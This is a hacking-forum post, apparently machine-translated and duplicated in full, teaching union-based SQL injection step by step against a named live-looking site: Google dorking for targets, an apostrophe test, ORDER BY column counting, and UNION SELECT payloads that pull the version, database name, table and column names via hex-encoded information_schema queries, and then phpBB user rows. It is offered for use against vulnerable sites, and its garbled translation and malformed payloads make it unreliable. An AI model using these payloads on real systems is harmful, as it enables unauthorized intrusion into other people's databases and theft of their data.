qaqaqa
Compiler Tuner
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
200 XP
Hello
"SQL Injection" ...
It will "step by step," explains what you need to do if you found an "SQL injection" ... in my opinion one of the best tutorials on the topic "SQL Injection" ...
Here is a tutorial for the 'pretty simple way of an SQL Injection'
First Google ~ Dorkz
Second beginning
Third By Order +
4th Union + Select, version, database
5th Tables
6th Columns
7th data
8th Thanks for reading
First Google ~ Dorkz
- This single pair Google dorks, so you can search for SQLi Vuln-s.
SQLI Dorks - ~ ~ XakNet Forum
Second beginning
-So we are looking to start our first time a page from where we think that this SQLi Vuln-is.
Example:
Code:
http://modules.t-o-m-e.net/script.php?id=24
Now we are only just beginning to an apostrophe turn back to the URL:
Code:
http://modules.t-o-m-e.net/script.php?id=24'
If an error is returned to us now, we have found a Vuln.
On this example page to make the error, apparent by the following:
PHP Code:
"You have an error in your SQL syntax; check the manual that Corresponds to your MySQL server version for the right syntax to use near '\''at line 1"
+ By 3.Order
-Now we calculate using the SQL Command "Order + By" the Column number:
This tactic works like this:
We query the server to see if he has a certain number of column's, if NOT, then we return the page to output an error (This is, then she's column side has asked LESS than us)
If the site does not raise errors, it means that the page number of this column's either has or more.
For this we depend on the command "Order + By + number" ran back to the Vuln URL.
Column number stands for our number to be queried ...
Let's test it at once an example:
Code:
http://modules.tome.net/script.php?id=24+order+by+10--
AT THE END IS ALWAYS 2 minus drangehängt IN EVERY STEP OF THE WE WILL STILL MAKE!
This is asked whether the page has 10 columns. -> As a result we get an error, that is, the page has 10 columns but NOT less.
Now we just try a bit of rum ...
Code:
http://modules.tome.net/script.php?id=24+order+by+8--
Here NO error is issued, which means that the page has 8 columns, if we now make the opposite case:
Code:
http://modules.tome.net/script.php?id=24+order+by+9--
We see that he spends a mistake now we know: 9 Columns Columns = NO 8 = YES
4.Union + Select, version, database
-Now we have found the Column number thanks to the command "Order + By".
Column number = 8
This series, we now only once to the URL, and that by dranhängen back to the URL of the SQL Command "+ union + select + number".
Number stands for the number of columns back, we have previously determined.
This is not indicated as a single number. Namely given any number from 1 to the maximum column-number. (In this case: 1,2,3,4,5,6,7,8)
Let's test it to our example:
Code:
T.o.M.E. Library - Script 'zangband mutations (20kB)'
Now, the individual numbers on the displayed page spread, as the text of the page usually sucks, we have a MINUS set behind the ID, this invalidation is done:
Example:
To note here is the behind the 24 by MINUS: "id = 24"
PHP Code:
T.o.M.E.Library-Script'2 '
PHP Code:
Instead of the numbers we see now on the page,the version of MySQL we can, andcan spend the Database.
Version command:"Version ()"
Database command:"Database ()"
Now we pick a number, from which we recognize to see visible /.
For this example I'll take the second
To read the version we replace the URL in the "2" with the version command: "version ()"
Example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, version () ,3,4,5,6,7,8 -
Now we are on this page the following Issued: 5.0.87
This means the MySQL version is: 5.0.87
We are interested in only the first number of the version. 4 To this we have the harder it later Tables, read columns, as we would have guessed it then itself.
As this page MySQL Version: has 5 we can allow ourselves to spend the TABLE_NAME automatically.
The same we can do with the database command, I take this back to "2" and replace it with the Database command: "database ()"
Example:
Code:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, database () ,3,4,5,6,7,8 -
The Database name of this site is, therefore: darkdb
The database name, we should now write down somewhere for the next steps.
5th Tables
-Now we have the Column number, version, and the database name.
If the MySQL version: is 5, then we can let the Table Names spend easily automatically.
By our count (in this case again, "2") with "GROUP_CONCAT (table_name)" substitute. Furthermore, we now go to the END of the URL and go BEFORE the 2 minus "-" and then use the following: + from + where + + INFORMATION_SCHEMA.TABLES table_schema = 0x "hex Database"
Database-Hex stands for the hex string for the database name:
I wrote a little program that converts the database name to a hex string.
- - Simply the database name (in this case: darkdb) above entered into the TextBox, and then appearing above hex string copying: 64:61:72:6 b: 64:62
We still remove the colons of the hex string, then we have the following string: 6461726b6462
Now we are all one time with an example:
Code:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, GROUP_CONCAT (table_name), 3,4,5,6, 7,8 + from + where + + INFORMATION_SCHEMA.TABLES table_sc hema 0x6461726b6462 = -
Now we are normally several table names listed next to each other, this we should now note somewhere.
6th Columns
-Now we pick out a Table_Name from which we wish to read our other columns:
In this example, I'll take the Table: phpbb3acl_users -> this issue, we only allow ourselves once again as a hex string. We do this again with the tool.
PHP Code:
Then remove the colons yet, andwe have the following hex string:70687062623361636c5f7573657273
Now we remove the"GROUP_CONCAT (table_name)"with"GROUP_CONCAT (column_name)"
Then we remove from the previous step,the"+ from + where + + INFORMATION_SCHEMA.TABLES table_s chem a = 0x"hex Database"by"+from+where+ +information_schema.columns Table_ name=0x"Table Hex"
In our example looks like this:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, GROUP_CONCAT (column_name), 3,4,5, 6,7,8 + from + where + + information_schema.columns Table_ name = 0x70687062623361636c5f7573657273 -
Now we are re-issued a couple of columns, this we should note again.
I suppose for our example, the following columns: user_id
In this table, unfortunately, are not User_name, or User_passwörter, so I'll just user_id
7th Data
-Now we have a table and a column that we want to read from the table.
To allow us to output the data, we change "GROUP_CONCAT (column_name)" with "concat (user_id)"
From our previous step, we replace: "+ from + Database.TableName"
Database stands for the normal name of the database, ie: darkdb
table name stands for the normal table name we have chosen us, that is: phpbb3acl_users
Now we test it in our example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, concat (user_id), 3,4,5,6,7,8 + from + darkdb.phpbb3acl_users--
Well we spent the user_id is the first line, in this case: 7
In order to vote in such a list up and down we can hang after the
PHP Code:
"+ from + darkdb.phpbb3acl_users"nor a"limit + +0.1"
It looks like this:
Code:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, concat (user_id), 3,4,5,6,7,8 + from + limit + + darkdb.phpbb3acl_users 0.1 -
If we now change the 0 to 1, we go one line up, and we read the next "user_id" made it to 2 if we make a new back up at some point no longer exists.
If we want to read several columns at once, eg in this case (Forum_id and user_id)
then we simply replace "concat (user_id)" with "concat (user_id, 0x3a, forum_id)"
the 0x3a stands for a colon, then the user_id is separated from the forum_id by a colon.
Thanks for reading
Enjoy
"SQL Injection" ...
It will "step by step," explains what you need to do if you found an "SQL injection" ... in my opinion one of the best tutorials on the topic "SQL Injection" ...
Here is a tutorial for the 'pretty simple way of an SQL Injection'
First Google ~ Dorkz
Second beginning
Third By Order +
4th Union + Select, version, database
5th Tables
6th Columns
7th data
8th Thanks for reading
First Google ~ Dorkz
- This single pair Google dorks, so you can search for SQLi Vuln-s.
SQLI Dorks - ~ ~ XakNet Forum
Second beginning
-So we are looking to start our first time a page from where we think that this SQLi Vuln-is.
Example:
Code:
http://modules.t-o-m-e.net/script.php?id=24
Now we are only just beginning to an apostrophe turn back to the URL:
Code:
http://modules.t-o-m-e.net/script.php?id=24'
If an error is returned to us now, we have found a Vuln.
On this example page to make the error, apparent by the following:
PHP Code:
"You have an error in your SQL syntax; check the manual that Corresponds to your MySQL server version for the right syntax to use near '\''at line 1"
+ By 3.Order
-Now we calculate using the SQL Command "Order + By" the Column number:
This tactic works like this:
We query the server to see if he has a certain number of column's, if NOT, then we return the page to output an error (This is, then she's column side has asked LESS than us)
If the site does not raise errors, it means that the page number of this column's either has or more.
For this we depend on the command "Order + By + number" ran back to the Vuln URL.
Column number stands for our number to be queried ...
Let's test it at once an example:
Code:
http://modules.tome.net/script.php?id=24+order+by+10--
AT THE END IS ALWAYS 2 minus drangehängt IN EVERY STEP OF THE WE WILL STILL MAKE!
This is asked whether the page has 10 columns. -> As a result we get an error, that is, the page has 10 columns but NOT less.
Now we just try a bit of rum ...
Code:
http://modules.tome.net/script.php?id=24+order+by+8--
Here NO error is issued, which means that the page has 8 columns, if we now make the opposite case:
Code:
http://modules.tome.net/script.php?id=24+order+by+9--
We see that he spends a mistake now we know: 9 Columns Columns = NO 8 = YES
4.Union + Select, version, database
-Now we have found the Column number thanks to the command "Order + By".
Column number = 8
This series, we now only once to the URL, and that by dranhängen back to the URL of the SQL Command "+ union + select + number".
Number stands for the number of columns back, we have previously determined.
This is not indicated as a single number. Namely given any number from 1 to the maximum column-number. (In this case: 1,2,3,4,5,6,7,8)
Let's test it to our example:
Code:
T.o.M.E. Library - Script 'zangband mutations (20kB)'
Now, the individual numbers on the displayed page spread, as the text of the page usually sucks, we have a MINUS set behind the ID, this invalidation is done:
Example:
To note here is the behind the 24 by MINUS: "id = 24"
PHP Code:
T.o.M.E.Library-Script'2 '
PHP Code:
Instead of the numbers we see now on the page,the version of MySQL we can, andcan spend the Database.
Version command:"Version ()"
Database command:"Database ()"
Now we pick a number, from which we recognize to see visible /.
For this example I'll take the second
To read the version we replace the URL in the "2" with the version command: "version ()"
Example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, version () ,3,4,5,6,7,8 -
Now we are on this page the following Issued: 5.0.87
This means the MySQL version is: 5.0.87
We are interested in only the first number of the version. 4 To this we have the harder it later Tables, read columns, as we would have guessed it then itself.
As this page MySQL Version: has 5 we can allow ourselves to spend the TABLE_NAME automatically.
The same we can do with the database command, I take this back to "2" and replace it with the Database command: "database ()"
Example:
Code:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, database () ,3,4,5,6,7,8 -
The Database name of this site is, therefore: darkdb
The database name, we should now write down somewhere for the next steps.
5th Tables
-Now we have the Column number, version, and the database name.
If the MySQL version: is 5, then we can let the Table Names spend easily automatically.
By our count (in this case again, "2") with "GROUP_CONCAT (table_name)" substitute. Furthermore, we now go to the END of the URL and go BEFORE the 2 minus "-" and then use the following: + from + where + + INFORMATION_SCHEMA.TABLES table_schema = 0x "hex Database"
Database-Hex stands for the hex string for the database name:
I wrote a little program that converts the database name to a hex string.
- - Simply the database name (in this case: darkdb) above entered into the TextBox, and then appearing above hex string copying: 64:61:72:6 b: 64:62
We still remove the colons of the hex string, then we have the following string: 6461726b6462
Now we are all one time with an example:
Code:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, GROUP_CONCAT (table_name), 3,4,5,6, 7,8 + from + where + + INFORMATION_SCHEMA.TABLES table_sc hema 0x6461726b6462 = -
Now we are normally several table names listed next to each other, this we should now note somewhere.
6th Columns
-Now we pick out a Table_Name from which we wish to read our other columns:
In this example, I'll take the Table: phpbb3acl_users -> this issue, we only allow ourselves once again as a hex string. We do this again with the tool.
PHP Code:
Then remove the colons yet, andwe have the following hex string:70687062623361636c5f7573657273
Now we remove the"GROUP_CONCAT (table_name)"with"GROUP_CONCAT (column_name)"
Then we remove from the previous step,the"+ from + where + + INFORMATION_SCHEMA.TABLES table_s chem a = 0x"hex Database"by"+from+where+ +information_schema.columns Table_ name=0x"Table Hex"
In our example looks like this:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, GROUP_CONCAT (column_name), 3,4,5, 6,7,8 + from + where + + information_schema.columns Table_ name = 0x70687062623361636c5f7573657273 -
Now we are re-issued a couple of columns, this we should note again.
I suppose for our example, the following columns: user_id
In this table, unfortunately, are not User_name, or User_passwörter, so I'll just user_id
7th Data
-Now we have a table and a column that we want to read from the table.
To allow us to output the data, we change "GROUP_CONCAT (column_name)" with "concat (user_id)"
From our previous step, we replace: "+ from + Database.TableName"
Database stands for the normal name of the database, ie: darkdb
table name stands for the normal table name we have chosen us, that is: phpbb3acl_users
Now we test it in our example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, concat (user_id), 3,4,5,6,7,8 + from + darkdb.phpbb3acl_users--
Well we spent the user_id is the first line, in this case: 7
In order to vote in such a list up and down we can hang after the
PHP Code:
"+ from + darkdb.phpbb3acl_users"nor a"limit + +0.1"
It looks like this:
Code:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1, concat (user_id), 3,4,5,6,7,8 + from + limit + + darkdb.phpbb3acl_users 0.1 -
If we now change the 0 to 1, we go one line up, and we read the next "user_id" made it to 2 if we make a new back up at some point no longer exists.
If we want to read several columns at once, eg in this case (Forum_id and user_id)
then we simply replace "concat (user_id)" with "concat (user_id, 0x3a, forum_id)"
the 0x3a stands for a colon, then the user_id is separated from the forum_id by a colon.
Thanks for reading
Enjoy